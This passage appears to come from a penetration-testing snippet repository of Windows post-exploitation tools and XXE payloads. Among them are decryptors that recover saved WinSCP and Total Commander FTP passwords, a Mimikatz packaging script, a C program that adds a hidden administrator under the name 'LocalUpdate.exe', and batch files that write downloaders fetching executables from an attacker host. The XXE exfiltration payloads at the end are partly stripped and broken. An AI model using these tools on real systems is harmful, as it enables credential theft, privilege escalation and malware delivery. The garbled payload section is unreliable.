3 | echo $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "VAR_DOMAIN\VAR_USERNAME",$pw > script.ps1
4 | echo $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat" >> script.ps1
5 | echo Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' >> script.ps1


--------------------------------------------------------------------------------
/snippets/windows/utils/schcheck.bat:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | REM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat
 3 | REM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions.
 4 | REM - Note: At present the script only ECHO's tasks.
 5 | for /f  "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do (
 6 | 	for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do (
 7 | 	ECHO %%~x REM  > results.txt
 8 | 	)
 9 |  )
10 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/tcpwrecovery.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Copyright (C) <2013> 
  3 | 
  4 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
  5 | 
  6 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
  7 | 
  8 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
  9 | """
 10 | 
 11 | import os
 12 | import optparse
 13 | 
 14 | def process_file(filename):
 15 | 	try:
 16 | 		print "-> Trying: " + filename
 17 | 		f = open(filename,"r")
 18 | 		print "-> Found: " + filename
 19 | 		print "-> Decrypting: " + filename
 20 | 		print ""
 21 | 		for line in f:
 22 | 			if ("password" in line.strip()):
 23 | 				print "password=" + tc_decrypt(line.strip().split("=")[1])
 24 | 			else: print line.strip()
 25 | 		f.close()
 26 | 		print ""
 27 | 	except IOError:
 28 | 		print "-> Not found: " + filename
 29 | 		print ""
 30 | 
 31 | def search_ini():
 32 | 	"""
 33 | 	Search the wcx_ftp.ini file in common places
 34 | 	"""
 35 | 	folder = []
 36 | 	folder.append(os.getenv('APPDATA') + "\\GHISLER\\wcx_ftp.ini")
 37 | 	folder.append(os.getenv('SYSTEMROOT') + "\\wcx_ftp.ini")
 38 | 	folder.append("wcx_ftp.ini")
 39 | 	for ini in folder:
 40 | 		process_file(ini)
 41 | 
 42 | def tc_random(nMax):
 43 | 	global RANDOM_BASE
 44 | 	RANDOM_BASE = ((RANDOM_BASE * 0x8088405) & 0xffffffff) + 1
 45 | 	return (((RANDOM_BASE * nMax) >> 32)& 0xffffffff)
 46 | 
 47 | def tc_shift(n1, n2):
 48 | 	return (((n1 << n2) & 0xffffffff) | ((n1 >> (8 - n2)) & 0xffffffff)) &  0xff
 49 | 
 50 | def tc_decrypt(pwd):
 51 | 	global RANDOM_BASE
 52 | 	password=[]
 53 | 	for i in range(len(pwd)/2 - 4): #skip last 8 characters (4 * 2 bytes)
 54 | 		password.append(int(pwd[2*i:2*(i+1)],16))
 55 | 	pwlen = len(password)
 56 | 	
 57 | 	RANDOM_BASE = 849521
 58 | 
 59 | 	for i in range(pwlen):
 60 | 	  password[i] = tc_shift(password[i], tc_random(8))
 61 | 
 62 | 	RANDOM_BASE = 12345
 63 | 	for i in range(256):
 64 | 	  a=tc_random(pwlen)
 65 | 	  b=tc_random(pwlen)
 66 | 	  password[a],password[b] = password[b],password[a]
 67 | 
 68 | 	RANDOM_BASE = 42340
 69 | 	for i in range(pwlen):
 70 | 	  password[i] = (password[i] ^ tc_random(256)) & 0xff
 71 | 
 72 | 	RANDOM_BASE = 54321
 73 | 	for i in range(pwlen):
 74 | 	  password[i] =  (password[i] - tc_random(256)) & 0xff
 75 | 
 76 | 	for i in range(pwlen):
 77 | 		password[i] = chr(password[i])
 78 | 	
 79 | 	return "".join(password)
 80 | 
 81 | def main():
 82 | 	usage = "Usage: %prog [options]"
 83 | 	parser = optparse.OptionParser(usage=usage)
 84 | 	
 85 | 	parser.add_option('-c', '--common', action='store_true', dest='common', default=False, help='Search wcx_ftp.ini in common places')
 86 | 	parser.add_option('-f', '--file', action='store', dest="file", default='', help='File to decrypt')
 87 | 	parser.add_option('-p', '--password', action='store', dest='password', default='', help='Password to decrypt')
 88 | 	options, args = parser.parse_args()
 89 | 	if options.common:
 90 | 		search_ini()
 91 | 	if (options.file != ""):
 92 | 		process_file(options.file)
 93 | 	if (options.password != ""):
 94 | 		pw = tc_decrypt(options.password)
 95 | 		print "Decrypted password: " + pw
 96 | 	if (options.file == "" and options.password == "" and not options.common):
 97 | 		print "Nothing specified, run \"tcpwrecovery -h\" for options"
 98 | 	
 99 | if __name__ == '__main__':
100 | 	main()
101 | 
102 | 
103 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/update_invoke_mimikatz.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | # Source: https://raw.githubusercontent.com/gg-sec/update_invoke_mimikatz/30c459843e1cc7b4b218317f92c1f7af648ae002/update_invoke_mimikatz.py
 4 | 
 5 | # Add the newest version of Mimikatz to Invoke-Mimikatz, a powershell version of mimikatz
 6 | # Get the newest version von Benjamin Delphis Github first and extract it to this directory
 7 | 
 8 | # wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.7z
 9 | # Got to be replaced with the most recent version, this one here is from March 2020
10 | 
11 | 
12 | import fileinput
13 | import base64
14 | 
15 | 
16 | 
17 | with open("./Win32/mimikatz.exe", "rb") as f:
18 |     win32 = base64.b64encode(f.read()).decode()
19 | 
20 | with open("./x64/mimikatz.exe", "rb") as f:
21 |     x64 = base64.b64encode(f.read()).decode()
22 | 
23 | 
24 | for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):
25 | 
26 | 	line = line.rstrip('\r\n')
27 | 	if "$PEBytes64 = " in line:
28 | 		print("$PEBytes64 = '" + x64 + "'")
29 | 	elif "$PEBytes32 = " in line:
30 | 		print("$PEBytes32 = '" + win32 + "'")
31 | 	else:
32 | 		print(line)
33 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/useradd.c:
--------------------------------------------------------------------------------
 1 | // x86_64-w64-mingw32-gcc useradd.c -o LocalUpdate.exe
 2 | 
 3 | #include 
 4 | 
 5 | int main ()
 6 | {
 7 |     int i;
 8 |     i = system("net user VAR_USERNAME VAR_PASSWORD /add && net localgroup administrators VAR_USERNAME /add");
 9 |     return 0;
10 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/wget_ps1.bat:
--------------------------------------------------------------------------------
1 | REM powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
2 | 
3 | echo $storageDir = $pwd > wget.ps1
4 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1
5 | echo $url = "http://VAR_ATTACKER_HOST/file.exe" >> wget.ps1
6 | echo $file = "file.exe" >> wget.ps1
7 | echo $webclient.DownloadFile($url,$file) >> wget.ps1


--------------------------------------------------------------------------------
/snippets/windows/utils/wget_vbs.bat:
--------------------------------------------------------------------------------
 1 | REM cscript wget.vbs http://VAR_ATTACKER_HOST/file.exe file.exe
 2 | 
 3 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs
 4 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
 5 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
 6 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
 7 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
 8 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
 9 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
10 | echo Err.Clear >> wget.vbs
11 | echo Set http = Nothing >> wget.vbs
12 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
13 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
14 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
15 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
16 | echo http.Open "GET",strURL,False >> wget.vbs
17 | echo http.Send >> wget.vbs
18 | echo varByteArray = http.ResponseBody >> wget.vbs
19 | echo Set http = Nothing >> wget.vbs
20 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
21 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
22 | echo strData = "" >> wget.vbs
23 | echo strBuffer = "" >> wget.vbs
24 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
25 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
26 | echo Next >> wget.vbs
27 | echo ts.Close >> wget.vbs


--------------------------------------------------------------------------------
/snippets/windows/utils/winscppassword.py:
--------------------------------------------------------------------------------
  1 | # coding=utf-8
  2 | 
  3 | # Source: https://github.com/dzxs/winscppassword
  4 | 
  5 | try:
  6 |     import _winreg
  7 | except:
  8 |     import winreg as _winreg
  9 | import random
 10 | 
 11 | PWALG_SIMPLE = 1
 12 | PWALG_SIMPLE_MAGIC = 0xA3
 13 | PWALG_SIMPLE_STRING = '0123456789ABCDEF'
 14 | PWALG_SIMPLE_MAXLEN = 50
 15 | PWALG_SIMPLE_FLAG = 0xFF
 16 | PWALG_SIMPLE_INTERNAL = 0x00
 17 | 
 18 | 
 19 | def simple_encrypt_char(char):
 20 |     char = ~char ^ PWALG_SIMPLE_MAGIC
 21 |     a = (char & 0xF0) >> 4
 22 |     b = (char & 0x0F) >> 0
 23 |     return PWALG_SIMPLE_STRING[a] + PWALG_SIMPLE_STRING[b]
 24 | 
 25 | 
 26 | def simple_decrypt_next_char(password_list):
 27 |     if len(password_list) <= 0:
 28 |         return 0x00
 29 |     a = PWALG_SIMPLE_STRING.find(password_list.pop(0))
 30 |     b = PWALG_SIMPLE_STRING.find(password_list.pop(0))
 31 |     return 0xff & ~(((a << 4) + b << 0) ^ PWALG_SIMPLE_MAGIC)
 32 | 
 33 | 
 34 | def encrypt_password(password, key):
 35 |     """
 36 |     encrypt_password('helloworld123', 'root'+'120.24.61.91')
 37 |     """
 38 |     password = key + password
 39 |     if len(password) < PWALG_SIMPLE_MAXLEN:
 40 |         shift = random.randint(0, PWALG_SIMPLE_MAXLEN - len(password))
 41 |     else:
 42 |         shift = 0
 43 |     result = ''
 44 |     result += simple_encrypt_char(PWALG_SIMPLE_FLAG)
 45 |     result += simple_encrypt_char(PWALG_SIMPLE_INTERNAL)
 46 |     result += simple_encrypt_char(len(password))
 47 |     result += simple_encrypt_char(shift)
 48 |     for i in range(shift):
 49 |         result += simple_encrypt_char(random.randint(0, 256))
 50 |     for i in password:
 51 |         result += simple_encrypt_char(ord(i))
 52 |     while len(result) < PWALG_SIMPLE_MAXLEN * 2:
 53 |         result += simple_encrypt_char(random.randint(0, 256))
 54 |     return result
 55 | 
 56 | 
 57 | def decrypt_password(password, key):
 58 |     """
 59 |     decrypt_password(encrypt_password, 'root'+'120.24.61.91')
 60 |     """
 61 |     if not password or not key:
 62 |         return ''
 63 |     password = list(password)
 64 |     flag = simple_decrypt_next_char(password)
 65 |     if flag == PWALG_SIMPLE_FLAG:
 66 |         _ = simple_decrypt_next_char(password)
 67 |         length = simple_decrypt_next_char(password)
 68 |     else:
 69 |         length = flag
 70 |     password = password[int(simple_decrypt_next_char(password)) * 2:]
 71 |     result = ''
 72 |     for i in range(length):
 73 |         result += chr(simple_decrypt_next_char(password))
 74 |     # print result
 75 |     if flag == PWALG_SIMPLE_FLAG:
 76 |         if result[:len(key)] != key:
 77 |             result = ''
 78 |         else:
 79 |             result = result[len(key):]
 80 |     return result
 81 | 
 82 | 
 83 | def get_value(session_key, str):
 84 |     try:
 85 |         value = _winreg.QueryValueEx(session_key, str)[0]
 86 |     except Exception as e:
 87 |         value = ''
 88 |     return value
 89 | 
 90 | 
 91 | def get_password():
 92 |     decrypt_args = []
 93 |     sessions_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions')
 94 |     count = _winreg.QueryInfoKey(sessions_key)[0]
 95 |     for index in range(count):
 96 |         session = _winreg.EnumKey(sessions_key, index)
 97 |         # print session
 98 |         session_key = _winreg.OpenKey(sessions_key, session)
 99 |         username = get_value(session_key, 'UserName')
100 |         password = get_value(session_key, 'Password')
101 |         hostname = get_value(session_key, 'HostName')
102 |         decrypt_args.append({'password': password, 'username': username, 'hostname': hostname})
103 |         _winreg.CloseKey(session_key)
104 | 
105 |     _winreg.CloseKey(sessions_key)
106 |     return decrypt_args
107 | 
108 | 
109 | if __name__ == '__main__':
110 |     for session in get_password():
111 |         print(u"hostname: {0}\nusername: {1}\nencrypt_password: {2}\npassword: {3}\n".format(
112 |             session['hostname'],
113 |             session['username'],
114 |             session['password'],
115 |             decrypt_password(session['password'], session['username'] + session['hostname']),
116 |         ))
117 | 


--------------------------------------------------------------------------------
/snippets/xml/xee.txt:
--------------------------------------------------------------------------------
  1 | -- Source: https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67deb/XXE_payloads
  2 | 
  3 | `` Vanilla, used to verify outbound xxe or blind xxe
  4 | 
  5 |     
  6 |     
  8 |     
  9 |     ]>
 10 |     &sp;
 11 | 
 12 | `` OoB extraction
 13 | 
 14 |     
 15 |     
 17 |     
 18 |     %sp;
 19 |     %param1;
 20 |     ]>
 21 |     &exfil;
 22 | 
 23 |     `` External dtd:
 24 | 
 25 |         
 26 |         ">
 27 | 
 28 | `` OoB variation of above (seems to work better against .NET)
 29 | 
 30 |     
 31 |     
 33 |     
 34 |     %sp;
 35 |     %param1;
 36 |     %exfil;
 37 |     ]>
 38 | 
 39 |     `` External dtd:
 40 | 
 41 |         
 42 |         ">
 43 | 
 44 | `` OoB extraction
 45 | 
 46 |     
 47 |     
 49 |     
 50 |     %sp;
 51 |     %param3;
 52 |     %exfil;
 53 |     ]>
 54 | 
 55 |     `` External dtd:
 56 | 
 57 |         ">
 58 | 
 59 | `` OoB extra ERROR -- Java
 60 | 
 61 |     
 62 |     
 64 |     
 65 |     %sp;
 66 |     %param3;
 67 |     %exfil;
 68 |     ]>
 69 |     
 70 | 
 71 |     `` External dtd:
 72 | 
 73 |         '> %param1; %external;
 74 | 
 75 | `` OoB extra nice
 76 | 
 77 |     
 78 |     
 80 |      
 81 |     ">
 82 |     
 83 |     %dtd;
 84 |     ]>
 85 |     &all;
 86 | 
 87 |         `` External dtd:
 88 | 
 89 |         
 90 | 
 91 | `` File-not-found exception based extraction
 92 | 
 93 |     
 94 |     
 96 |       %one;
 97 |       %two;
 98 |       %four;
 99 |     ]>
100 | 
101 |     `` External dtd:
102 | 
103 |         
104 |         ">
105 |         --                       ^ you might need to encode this % (depends on your target) as: %
106 | 
107 | `` FTP
108 | 
109 |     
110 |     
112 |     %asd;
113 |     %c;
114 |     ]>
115 |     &rrr;
116 | 
117 |     `` External dtd
118 | 
119 |         
120 |         ">
121 | 
122 | `` Inside SOAP body
123 | 
124 |      %dtd;]>]]>
125 | 
126 | `` Untested - WAF Bypass
127 | 
128 |